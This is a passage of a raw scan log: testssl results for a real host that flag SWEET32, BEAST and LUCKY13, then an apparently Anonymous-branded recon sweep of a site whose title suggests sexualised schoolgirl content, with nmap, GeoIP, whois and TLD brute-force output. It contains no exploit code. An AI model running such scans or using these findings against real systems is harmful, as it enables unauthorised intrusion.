1802. TLS 1.1 not vulnerable to heartbleed
1803. TLS 1.0 not vulnerable to heartbleed
1804.  
1805. Supported Server Cipher(s):
1806. Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
1807. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
1808. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
1809. Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 2048 bits
1810. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 2048 bits
1811. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
1812. Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
1813. Accepted TLSv1.2 256 bits AES256-GCM-SHA384
1814. Accepted TLSv1.2 256 bits AES256-SHA256
1815. Accepted TLSv1.2 256 bits AES256-SHA
1816. Accepted TLSv1.2 256 bits CAMELLIA256-SHA
1817. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
1818. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
1819. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
1820. Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 2048 bits
1821. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 2048 bits
1822. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
1823. Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
1824. Accepted TLSv1.2 128 bits AES128-GCM-SHA256
1825. Accepted TLSv1.2 128 bits AES128-SHA256
1826. Accepted TLSv1.2 128 bits AES128-SHA
1827. Accepted TLSv1.2 128 bits CAMELLIA128-SHA
1828. Accepted TLSv1.2 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
1829. Accepted TLSv1.2 112 bits EDH-RSA-DES-CBC3-SHA DHE 2048 bits
1830. Accepted TLSv1.2 112 bits DES-CBC3-SHA
1831. Preferred TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
1832. Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
1833. Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
1834. Accepted TLSv1.1 256 bits AES256-SHA
1835. Accepted TLSv1.1 256 bits CAMELLIA256-SHA
1836. Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
1837. Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
1838. Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
1839. Accepted TLSv1.1 128 bits AES128-SHA
1840. Accepted TLSv1.1 128 bits CAMELLIA128-SHA
1841. Accepted TLSv1.1 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
1842. Accepted TLSv1.1 112 bits EDH-RSA-DES-CBC3-SHA DHE 2048 bits
1843. Accepted TLSv1.1 112 bits DES-CBC3-SHA
1844. Preferred TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
1845. Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 2048 bits
1846. Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 2048 bits
1847. Accepted TLSv1.0 256 bits AES256-SHA
1848. Accepted TLSv1.0 256 bits CAMELLIA256-SHA
1849. Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
1850. Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 2048 bits
1851. Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 2048 bits
1852. Accepted TLSv1.0 128 bits AES128-SHA
1853. Accepted TLSv1.0 128 bits CAMELLIA128-SHA
1854. Accepted TLSv1.0 112 bits ECDHE-RSA-DES-CBC3-SHA Curve P-256 DHE 256
1855. Accepted TLSv1.0 112 bits EDH-RSA-DES-CBC3-SHA DHE 2048 bits
1856. Accepted TLSv1.0 112 bits DES-CBC3-SHA
1857.  
1858. SSL Certificate:
1859. Signature Algorithm: sha1WithRSAEncryption
1860. RSA Key Strength: 2048
1861.  
1862. Subject: localhost
1863. Issuer: localhost
1864.  
1865. Not valid before: Oct 1 09:40:25 2015 GMT
1866. Not valid after: Feb 15 09:40:25 2043 GMT
1867.  
1868. ###########################################################
1869. testssl 2.9dev from https://testssl.sh/dev/
1870.  
1871. This program is free software. Distribution and
1872. modification under GPLv2 permitted.
1873. USAGE w/o ANY WARRANTY. USE IT AT YOUR OWN RISK!
1874.  
1875. Please file bugs @ https://testssl.sh/bugs/
1876.  
1877. ###########################################################
1878.  
1879. Using "OpenSSL 1.0.2-chacha (1.0.2i-dev)" [~183 ciphers]
1880. on Kali:/usr/share/sniper/plugins/testssl.sh/bin/openssl.Linux.x86_64
1881. (built: "Jun 22 19:32:29 2016", platform: "linux-x86_64")
1882.  
1883.  
1884. Start 2017-09-29 23:21:32 -->> 80.82.69.63:443 (cv2.dreamcaster.info) <<--
1885.  
1886. rDNS (80.82.69.63): jademonitor.net.
1887. Service detected: HTTP
1888.  
1889.  
1890. Testing protocols via sockets except SPDY+HTTP2
1891.  
1892. SSLv2 not offered (OK)
1893. SSLv3 not offered (OK)
1894. TLS 1 offered
1895. TLS 1.1 offered
1896. TLS 1.2 offered (OK)
1897. SPDY/NPN not offered
1898. HTTP2/ALPN not offered
1899.  
1900. Testing ~standard cipher categories
1901.  
1902. NULL ciphers (no encryption) not offered (OK)
1903. Anonymous NULL Ciphers (no authentication) not offered (OK)
1904. Export ciphers (w/o ADH+NULL) not offered (OK)
1905. LOW: 64 Bit + DES encryption (w/o export) not offered (OK)
1906. Weak 128 Bit ciphers (SEED, IDEA, RC[2,4]) not offered (OK)
1907. Triple DES Ciphers (Medium) offered
1908. High encryption (AES+Camellia, no AEAD) offered (OK)
1909. Strong encryption (AEAD ciphers) offered (OK)
1910.  
1911.  
1912. Testing robust (perfect) forward secrecy, (P)FS -- omitting Null Authentication/Encryption, 3DES, RC4
1913.  
1914. PFS is offered (OK) ECDHE-RSA-AES256-GCM-SHA384
1915. ECDHE-RSA-AES256-SHA384 ECDHE-RSA-AES256-SHA
1916. DHE-RSA-AES256-GCM-SHA384 DHE-RSA-AES256-SHA256
1917. DHE-RSA-AES256-SHA DHE-RSA-CAMELLIA256-SHA
1918. ECDHE-RSA-AES128-GCM-SHA256
1919. ECDHE-RSA-AES128-SHA256 ECDHE-RSA-AES128-SHA
1920. DHE-RSA-AES128-GCM-SHA256 DHE-RSA-AES128-SHA256
1921. DHE-RSA-AES128-SHA DHE-RSA-CAMELLIA128-SHA
1922. Elliptic curves offered: prime256v1
1923.  
1924.  
1925. Testing server preferences
1926.  
1927. Has server cipher order? yes (OK)
1928. Negotiated protocol TLSv1.2
1929. Negotiated cipher ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
1930. Cipher order
1931. TLSv1: ECDHE-RSA-AES256-SHA DHE-RSA-AES256-SHA DHE-RSA-CAMELLIA256-SHA
1932. AES256-SHA CAMELLIA256-SHA ECDHE-RSA-AES128-SHA
1933. DHE-RSA-AES128-SHA DHE-RSA-CAMELLIA128-SHA AES128-SHA
1934. CAMELLIA128-SHA ECDHE-RSA-DES-CBC3-SHA EDH-RSA-DES-CBC3-SHA
1935. DES-CBC3-SHA
1936. TLSv1.1: ECDHE-RSA-AES256-SHA DHE-RSA-AES256-SHA DHE-RSA-CAMELLIA256-SHA
1937. AES256-SHA CAMELLIA256-SHA ECDHE-RSA-AES128-SHA
1938. DHE-RSA-AES128-SHA DHE-RSA-CAMELLIA128-SHA AES128-SHA
1939. CAMELLIA128-SHA ECDHE-RSA-DES-CBC3-SHA EDH-RSA-DES-CBC3-SHA
1940. DES-CBC3-SHA
1941. TLSv1.2: ECDHE-RSA-AES256-GCM-SHA384 ECDHE-RSA-AES256-SHA384
1942. ECDHE-RSA-AES256-SHA DHE-RSA-AES256-GCM-SHA384
1943. DHE-RSA-AES256-SHA256 DHE-RSA-AES256-SHA DHE-RSA-CAMELLIA256-SHA
1944. AES256-GCM-SHA384 AES256-SHA256 AES256-SHA CAMELLIA256-SHA
1945. ECDHE-RSA-AES128-GCM-SHA256 ECDHE-RSA-AES128-SHA256
1946. ECDHE-RSA-AES128-SHA DHE-RSA-AES128-GCM-SHA256
1947. DHE-RSA-AES128-SHA256 DHE-RSA-AES128-SHA DHE-RSA-CAMELLIA128-SHA
1948. AES128-GCM-SHA256 AES128-SHA256 AES128-SHA CAMELLIA128-SHA
1949. ECDHE-RSA-DES-CBC3-SHA EDH-RSA-DES-CBC3-SHA DES-CBC3-SHA
1950.  
1951.  
1952. Testing server defaults (Server Hello)
1953.  
1954. TLS extensions (standard) "renegotiation info/#65281"
1955. "EC point formats/#11" "session ticket/#35"
1956. "heartbeat/#15"
1957. Session Ticket RFC 5077 hint 300 seconds, session tickets keys seems to be rotated < daily
1958. SSL Session ID support yes
1959. Session Resumption Tickets: yes, ID: yes
1960. TLS clock skew +385 sec from localtime
1961. Signature Algorithm SHA1 with RSA -- besides: users will receive a strong browser WARNING
1962. Server key size RSA 2048 bits
1963. Fingerprint / Serial SHA1 19EA54CEFF0E77B003342B0AAA9EA481F5650116 / 831942CF510F668A
1964. SHA256 F8DFD09CDE3786DFC7665BA6221BABC67030C5C390F19EA9790DB6B4CB2E5BEC
1965. Common Name (CN) localhost
1966. subjectAltName (SAN) missing (NOT ok) -- Browsers are complaining
1967. Issuer self-signed (NOT ok)
1968. Trust (hostname) certificate does not match supplied URI (same w/o SNI)
1969. Chain of trust NOT ok (self signed)
1970. EV cert (experimental) no
1971. Certificate Expiration 9269 >= 60 days (2015-10-01 05:40 --> 2043-02-15 04:40 -0500)
1972. # of certificates provided 1
1973. Certificate Revocation List NOT ok -- neither CRL nor OCSP URI provided
1974. OCSP URI --
1975. OCSP stapling --
1976. OCSP must staple no
1977. DNS CAA RR (experimental) --
1978. Certificate Transparency no
1979.  
1980.  
1981. Testing HTTP header response @ "/"
1982.  
1983. HTTP Status Code 200 OK
1984. HTTP clock skew +387 sec from localtime
1985. Strict Transport Security --
1986. Public Key Pinning --
1987. Server banner Apache/2
1988. Application banner --
1989. Cookie(s) (none issued at "/")
1990. Security headers --
1991. Reverse Proxy banner --
1992.  
1993.  
1994. Testing vulnerabilities
1995.  
1996. Heartbleed (CVE-2014-0160) not vulnerable (OK), timed out
1997. CCS (CVE-2014-0224) not vulnerable (OK)
1998. Ticketbleed (CVE-2016-9244), experiment. not vulnerable (OK), memory fragments do not differ
1999. Secure Renegotiation (CVE-2009-3555) not vulnerable (OK)
2000. Secure Client-Initiated Renegotiation not vulnerable (OK)
2001. CRIME, TLS (CVE-2012-4929) not vulnerable (OK)
2002. BREACH (CVE-2013-3587) no HTTP compression (OK) - only supplied "/" tested
2003. POODLE, SSL (CVE-2014-3566) not vulnerable (OK)
2004. TLS_FALLBACK_SCSV (RFC 7507) Downgrade attack prevention supported (OK)
2005. SWEET32 (CVE-2016-2183, CVE-2016-6329) VULNERABLE, uses 64 bit block ciphers
2006. FREAK (CVE-2015-0204) not vulnerable (OK)
2007. DROWN (CVE-2016-0800, CVE-2016-0703) not vulnerable on this host and port (OK)
2008. make sure you don't use this certificate elsewhere with SSLv2 enabled services
2009. https://censys.io/ipv4?q=F8DFD09CDE3786DFC7665BA6221BABC67030C5C390F19EA9790DB6B4CB2E5BEC could help you to find out
2010. LOGJAM (CVE-2015-4000), experimental Common prime with 2048 bits detected: RFC3526/Oakley Group 14,
2011. but no DH EXPORT ciphers
2012. BEAST (CVE-2011-3389) TLS1: ECDHE-RSA-AES256-SHA
2013. DHE-RSA-AES256-SHA
2014. DHE-RSA-CAMELLIA256-SHA
2015. AES256-SHA CAMELLIA256-SHA
2016. ECDHE-RSA-AES128-SHA
2017. DHE-RSA-AES128-SHA
2018. DHE-RSA-CAMELLIA128-SHA
2019. AES128-SHA CAMELLIA128-SHA
2020. ECDHE-RSA-DES-CBC3-SHA
2021. EDH-RSA-DES-CBC3-SHA
2022. DES-CBC3-SHA
2023. VULNERABLE -- but also supports higher protocols (possible mitigation): TLSv1.1 TLSv1.2
2024. LUCKY13 (CVE-2013-0169), experimental potentially VULNERABLE, uses cipher block chaining (CBC) ciphers with TLS
2025. RC4 (CVE-2013-2566, CVE-2015-2808) no RC4 ciphers detected (OK)
2026.  
2027.  
2028. Testing 359 ciphers via OpenSSL plus sockets against the server, ordered by encryption strength
2029.  
2030. Hexcode Cipher Suite Name (OpenSSL) KeyExch. Encryption Bits Cipher Suite Name (RFC)
2031. -----------------------------------------------------------------------------------------------------------------------------
2032. xc030 ECDHE-RSA-AES256-GCM-SHA384 ECDH 256 AESGCM 256 TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
2033. xc028 ECDHE-RSA-AES256-SHA384 ECDH 256 AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384
2034. xc014 ECDHE-RSA-AES256-SHA ECDH 256 AES 256 TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA
2035. x9f DHE-RSA-AES256-GCM-SHA384 DH 2048 AESGCM 256 TLS_DHE_RSA_WITH_AES_256_GCM_SHA384
2036. x6b DHE-RSA-AES256-SHA256 DH 2048 AES 256 TLS_DHE_RSA_WITH_AES_256_CBC_SHA256
2037. x39 DHE-RSA-AES256-SHA DH 2048 AES 256 TLS_DHE_RSA_WITH_AES_256_CBC_SHA
2038. x88 DHE-RSA-CAMELLIA256-SHA DH 2048 Camellia 256 TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA
2039. x9d AES256-GCM-SHA384 RSA AESGCM 256 TLS_RSA_WITH_AES_256_GCM_SHA384
2040. x3d AES256-SHA256 RSA AES 256 TLS_RSA_WITH_AES_256_CBC_SHA256
2041. x35 AES256-SHA RSA AES 256 TLS_RSA_WITH_AES_256_CBC_SHA
2042. x84 CAMELLIA256-SHA RSA Camellia 256 TLS_RSA_WITH_CAMELLIA_256_CBC_SHA
2043. xc02f ECDHE-RSA-AES128-GCM-SHA256 ECDH 256 AESGCM 128 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
2044. xc027 ECDHE-RSA-AES128-SHA256 ECDH 256 AES 128 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256
2045. xc013 ECDHE-RSA-AES128-SHA ECDH 256 AES 128 TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA
2046. x9e DHE-RSA-AES128-GCM-SHA256 DH 2048 AESGCM 128 TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
2047. x67 DHE-RSA-AES128-SHA256 DH 2048 AES 128 TLS_DHE_RSA_WITH_AES_128_CBC_SHA256
2048. x33 DHE-RSA-AES128-SHA DH 2048 AES 128 TLS_DHE_RSA_WITH_AES_128_CBC_SHA
2049. x45 DHE-RSA-CAMELLIA128-SHA DH 2048 Camellia 128 TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA
2050. x9c AES128-GCM-SHA256 RSA AESGCM 128 TLS_RSA_WITH_AES_128_GCM_SHA256
2051. x3c AES128-SHA256 RSA AES 128 TLS_RSA_WITH_AES_128_CBC_SHA256
2052. x2f AES128-SHA RSA AES 128 TLS_RSA_WITH_AES_128_CBC_SHA
2053. x41 CAMELLIA128-SHA RSA Camellia 128 TLS_RSA_WITH_CAMELLIA_128_CBC_SHA
2054. xc012 ECDHE-RSA-DES-CBC3-SHA ECDH 256 3DES 168 TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA
2055. x16 EDH-RSA-DES-CBC3-SHA DH 2048 3DES 168 TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
2056. x0a DES-CBC3-SHA RSA 3DES 168 TLS_RSA_WITH_3DES_EDE_CBC_SHA
2057.  
2058.  
2059. Running client simulations via sockets
2060.  
2061. Android 2.3.7 TLSv1.0 DHE-RSA-AES128-SHA, 2048 bit DH
2062. Android 4.1.1 TLSv1.0 ECDHE-RSA-AES256-SHA, 256 bit ECDH (P-256)
2063. Android 4.3 TLSv1.0 ECDHE-RSA-AES256-SHA, 256 bit ECDH (P-256)
2064. Android 4.4.2 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
2065. Android 5.0.0 TLSv1.2 ECDHE-RSA-AES256-SHA, 256 bit ECDH (P-256)
2066. Android 6.0 TLSv1.2 ECDHE-RSA-AES256-SHA, 256 bit ECDH (P-256)
2067. Android 7.0 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
2068. Chrome 51 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
2069. Chrome 57 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
2070. Firefox 49 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
2071. Firefox 53 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
2072. IE 6 XP No connection
2073. IE 7 Vista TLSv1.0 ECDHE-RSA-AES256-SHA, 256 bit ECDH (P-256)
2074. IE 8 XP TLSv1.0 DES-CBC3-SHA
2075. IE 8 Win 7 TLSv1.0 ECDHE-RSA-AES256-SHA, 256 bit ECDH (P-256)
2076. IE 11 Win 7 TLSv1.2 ECDHE-RSA-AES256-SHA384, 256 bit ECDH (P-256)
2077. IE 11 Win 8.1 TLSv1.2 ECDHE-RSA-AES256-SHA384, 256 bit ECDH (P-256)
2078. IE 11 Win Phone 8.1 Update TLSv1.2 ECDHE-RSA-AES256-SHA384, 256 bit ECDH (P-256)
2079. IE 11 Win 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
2080. Edge 13 Win 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
2081. Edge 13 Win Phone 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
2082. Opera 17 Win 7 TLSv1.2 ECDHE-RSA-AES256-SHA, 256 bit ECDH (P-256)
2083. Safari 5.1.9 OS X 10.6.8 TLSv1.0 ECDHE-RSA-AES256-SHA, 256 bit ECDH (P-256)
2084. Safari 7 iOS 7.1 TLSv1.2 ECDHE-RSA-AES256-SHA384, 256 bit ECDH (P-256)
2085. Safari 9 OS X 10.11 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
2086. Safari 10 OS X 10.12 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
2087. Apple ATS 9 iOS 9 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
2088. Tor 17.0.9 Win 7 TLSv1.0 ECDHE-RSA-AES256-SHA, 256 bit ECDH (P-256)
2089. Java 6u45 No connection
2090. Java 7u25 TLSv1.0 ECDHE-RSA-AES128-SHA, 256 bit ECDH (P-256)
2091. Java 8u31 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
2092. OpenSSL 1.0.1l TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
2093. OpenSSL 1.0.2e TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 256 bit ECDH (P-256)
2094.  
2095. Done 2017-09-29 23:24:51 [ 201s] -->> 80.82.69.63:443 (cv2.dreamcaster.info) <<--
2096. ######################################################################################################################################
2097. Hostname video1.school-models.net ISP Tele Asia Limited (AS133398)
2098. Continent Europe Flag
2099. LT
2100. Country Lithuania Country Code LT (LTU)
2101. Region 57 Local time 30 Sep 2017 07:17 EEST
2102. Metropolis Unknown Postal Code 44001
2103. City Kaunas Latitude 54.9
2104. IP Address 45.123.190.187 Longitude 23.9
2105. ######################################################################################################################################
2106. HunterUnit JTSEC full Recon Anonymous #2
2107. [i] Scanning Site: http://video1.school-models.net
2108.  
2109.  
2110.  
2111. B A S I C I N F O
2112. ====================
2113.  
2114.  
2115. [+] Site Title: SCHOOL MODELS|ORIENTAL SCHOOLGIRLS NONUDE| SCHOOL MODELS VIDEO ISSUE 1
2116. [+] IP address: 45.123.190.187
2117. [+] Web Server: nginx/1.10.2
2118. [+] CMS: Could Not Detect
2119. [+] Cloudflare: Not Detected
2120. [+] Robots File: Found
2121.  
2122. -------------[ contents ]----------------
2123. # vestacp autogenerated robots.txt
2124. User-agent: *
2125. Crawl-delay: 10
2126.  
2127. -----------[end of contents]-------------
2128.  
2129.  
2130.  
2131. W H O I S L O O K U P
2132. ========================
2133.  
2134. No match for "VIDEO1.SCHOOL-MODELS.NET".
2135. >>> Last update of whois database: 2017-09-30T04:19:03Z <<<
2136.  
2137. NOTICE: The expiration date displayed in this record is the date the
2138. registrar's sponsorship of the domain name registration in the registry is
2139. currently set to expire. This date does not necessarily reflect the expiration
2140. date of the domain name registrant's agreement with the sponsoring
2141. registrar. Users may consult the sponsoring registrar's Whois database to
2142. view the registrar's reported date of expiration for this registration.
2143.  
2144.  
2145. The Registry database contains ONLY .COM, .NET, .EDU domains and
2146. Registrars.
2147.  
2148.  
2149.  
2150.  
2151. G E O I P L O O K U P
2152. =========================
2153.  
2154. [i] IP Address: 45.123.190.187
2155. [i] Country: LT
2156. [i] State: Kauno Apskritis
2157. [i] City: Kaunas
2158. [i] Latitude: 54.900002
2159. [i] Longitude: 23.900000
2160.  
2161.  
2162.  
2163.  
2164. H T T P H E A D E R S
2165. =======================
2166.  
2167.  
2168. [i] HTTP/1.1 200 OK
2169. [i] Server: nginx/1.10.2
2170. [i] Date: Sat, 30 Sep 2017 01:19:33 GMT
2171. [i] Content-Type: text/html; charset=UTF-8
2172. [i] Content-Length: 13395
2173. [i] Connection: close
2174. [i] Last-Modified: Sat, 07 Nov 2015 09:35:35 GMT
2175. [i] ETag: "3453-523f0150007c0"
2176. [i] Accept-Ranges: bytes
2177.  
2178.  
2179.  
2180.  
2181. D N S L O O K U P
2182. ===================
2183.  
2184. video1.school-models.net. 295 IN A 45.123.190.187
2185.  
2186.  
2187.  
2188.  
2189. S U B N E T C A L C U L A T I O N
2190. ====================================
2191.  
2192. Address = 45.123.190.187
2193. Network = 45.123.190.187 / 32
2194. Netmask = 255.255.255.255
2195. Broadcast = not needed on Point-to-Point links
2196. Wildcard Mask = 0.0.0.0
2197. Hosts Bits = 0
2198. Max. Hosts = 1 (2^0 - 0)
2199. Host Range = { 45.123.190.187 - 45.123.190.187 }
2200.  
2201.  
2202.  
2203. N M A P P O R T S C A N
2204. ============================
2205.  
2206.  
2207. Starting Nmap 7.01 ( https://nmap.org ) at 2017-09-30 04:19 UTC
2208. Nmap scan report for video1.school-models.net (45.123.190.187)
2209. Host is up (0.15s latency).
2210. PORT STATE SERVICE VERSION
2211. 21/tcp closed ftp
2212. 22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
2213. 23/tcp closed telnet
2214. 25/tcp closed smtp
2215. 80/tcp open http nginx 1.10.2
2216. 110/tcp closed pop3
2217. 143/tcp closed imap
2218. 443/tcp closed https
2219. 445/tcp closed microsoft-ds
2220. 3389/tcp closed ms-wbt-server
2221.  
2222. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
2223. Nmap done: 1 IP address (1 host up) scanned in 14.02 seconds
2224.  
2225.  
2226.  
2227. S U B - D O M A I N F I N D E R
2228. ==================================
2229.  
2230.  
2231. [i] Total Subdomains Found : 1
2232.  
2233. [+] Subdomain: video1.school-models.net
2234. [-] IP: 191.96.113.236
2235.  
2236.  
2237.  
2238.  
2239.  
2240. R E V E R S E I P L O O K U P
2241. ==================================
2242. [*] Performing TLD Brute force Enumeration against 45.123.190.187
2243. [*] The operation could take up to: 00:01:07
2244. [*] A 45.ae 108.178.13.98
2245. [*] A 45.biz.af 5.45.75.45
2246. [*] A 45.ac 108.30.224.195
2247. [*] A 45.ai 23.234.27.209
2248. [*] A 45.al 176.9.32.122
2249. [*] A 45.am 43.252.120.170
2250. [*] A 45.at 72.52.4.90
2251. [*] A 45.co.asia 91.195.240.135
2252. [*] CNAME 45.biz.at free.biz.at
2253. [*] A free.biz.at 216.92.134.29
2254. [*] A 45.com.au 103.224.212.245
2255. [*] A 45.net.au 98.124.245.24
2256. [*] A 45.com.ax 185.55.85.123
2257. [*] A 45.org.aw 142.4.20.12
2258. [*] A 45.org.ax 185.55.85.123
2259. [*] A 45.com.am 118.193.137.224
2260. [*] A 45.co.ba 176.9.45.78
2261. [*] A 45.com.ba 195.222.33.180
2262. [*] A 45.be 217.19.237.54
2263. [*] A 45.com.be 95.173.170.166
2264. [*] A 45.by 178.162.211.68
2265. [*] A 45.biz.by 71.18.52.2
2266. [*] A 45.biz.bz 199.59.242.150
2267. [*] A 45.com.cc 54.252.107.64
2268. [*] A 45.net.cc 54.252.89.206
2269. [*] A 45.co.cc 175.126.123.219
2270. [*] A 45.cc 59.34.148.176
2271. [*] A 45.org.ch 72.52.4.122
2272. [*] A 45.ci 107.174.240.163
2273. [*] A 45.cl 72.52.4.90
2274. [*] A 45.biz.cl 185.53.178.8
2275. [*] A 45.cm 119.28.21.224
2276. [*] A 45.co.cm 85.25.140.105
2277. [*] CNAME 45.biz.cm i.cns.cm
2278. [*] A i.cns.cm 118.184.56.30
2279. [*] A 45.co 208.73.211.70
2280. [*] CNAME 45.cn num4.dcoin.co
2281. [*] A num4.dcoin.co 170.178.178.54
2282. [*] CNAME 45.com.cn num4.dcoin.co
2283. [*] A num4.dcoin.co 170.178.178.54
2284. [*] CNAME 45.net.cn num4.dcoin.co
2285. [*] A num4.dcoin.co 170.178.178.54
2286. [*] CNAME 45.org.cn num4.dcoin.co
2287. [*] A num4.dcoin.co 170.178.178.54
2288. [*] A 45.com.co 185.53.178.6
2289. [*] A 45.com.com 52.33.196.199
2290. [*] A 45.net.com 199.59.242.150
2291. [*] A 45.co.com 173.192.115.17
2292. [*] A 45.org.com 23.23.86.44
2293. [*] A 45.net.cm 85.25.140.105
2294. [*] A 45.biz.cr 72.52.4.122
2295. [*] A 45.biz.cx 72.52.4.122
2296. [*] A 45.cz 109.123.216.97
2297. [*] A 45.net.cz 80.250.24.177
2298. [*] A 45.com.cz 62.109.128.30
2299. [*] A 45.biz.cz 185.53.179.7
2300. [*] CNAME 45.cx parkmydomain.vhostgo.com
2301. [*] CNAME parkmydomain.vhostgo.com westuser.dopa.com
2302. [*] A westuser.dopa.com 107.186.245.119
2303. [*] A 45.com.de 50.56.68.37
2304. [*] A 45.de 89.238.79.227
2305. [*] CNAME 45.co.de co.de
2306. [*] A co.de 144.76.162.245
2307. [*] CNAME 45.org.de www.org.de
2308. [*] A www.org.de 78.47.128.8
2309. [*] A 45.dk 81.19.232.104
2310. [*] A 45.eu 72.52.4.90
2311. [*] A 45.net.eu 78.46.90.98
2312. [*] A 45.org.eu 78.46.90.98
2313. [*] A 45.biz.fi 185.55.85.123
2314. [*] CNAME 45.com.fi dnspod-vip3.mydnspod.net
2315. [*] A dnspod-vip3.mydnspod.net 119.28.48.237
2316. [*] A dnspod-vip3.mydnspod.net 119.28.48.218
2317. [*] A 45.fm 173.230.131.38
2318. [*] A 45.biz.fm 173.230.131.38
2319. [*] A 45.fr 178.32.4.52
2320. [*] A 45.org.fr 149.202.133.35
2321. [*] A 45.gg 103.39.110.120
2322. [*] A 45.biz.gl 72.52.4.122
2323. [*] A 45.co.gp 144.76.162.245
2324. [*] A 45.gs 23.23.99.200
2325. [*] A 45.gs 54.243.242.40
2326. [*] A 45.co.hn 208.100.40.203
2327. [*] A 45.com.hk 107.150.98.48
2328. [*] CNAME 45.biz.hn parkmydomain.vhostgo.com
2329. [*] CNAME parkmydomain.vhostgo.com westuser.dopa.com
2330. [*] A westuser.dopa.com 107.186.245.119
2331. [*] CNAME 45.net.hr net.hr
2332. [*] A net.hr 192.0.78.24
2333. [*] A net.hr 192.0.78.25
2334. [*] A 45.co.ht 72.52.4.122
2335. [*] A 45.id 203.119.112.50
2336. [*] A 45.io 69.172.201.153
2337. [*] A 45.is 67.199.248.12
2338. [*] A 45.is 67.199.248.13
2339. [*] CNAME 45.je num4.dcoin.co
2340. [*] A num4.dcoin.co 170.178.178.54
2341. [*] A 45.jobs 50.19.241.165
2342. [*] A 45.co.jobs 50.17.193.222
2343. [*] A 45.net.jobs 50.19.241.165
2344. [*] A 45.com.jobs 50.19.241.165
2345. [*] A 45.biz.jobs 50.19.241.165
2346. [*] A 45.org.jobs 50.19.241.165
2347. [*] A 45.co.kr 210.219.173.152
2348. [*] A 45.biz.ky 199.184.144.27
2349. [*] A 45.kz 47.88.56.244
2350. [*] A 45.la 162.159.209.75
2351. [*] A 45.la 162.159.208.75
2352. [*] CNAME 45.biz.li 712936.parkingcrew.net
2353. [*] A 712936.parkingcrew.net 185.53.179.29
2354. [*] A 45.lt 216.239.32.21
2355. [*] A 45.lt 216.239.34.21
2356. [*] A 45.lt 216.239.36.21
2357. [*] A 45.lt 216.239.38.21
2358. [*] A 45.biz.lu 195.26.5.2
2359. [*] A 45.lv 72.52.4.90
2360. [*] A 45.biz.ly 64.136.20.39
2361. [*] A 45.ma 41.77.113.174
2362. [*] A 45.biz.md 72.52.4.122
2363. [*] A 45.me 50.63.201.98
2364. [*] CNAME 45.mg cs.62.net
2365. [*] A cs.62.net 47.88.28.14
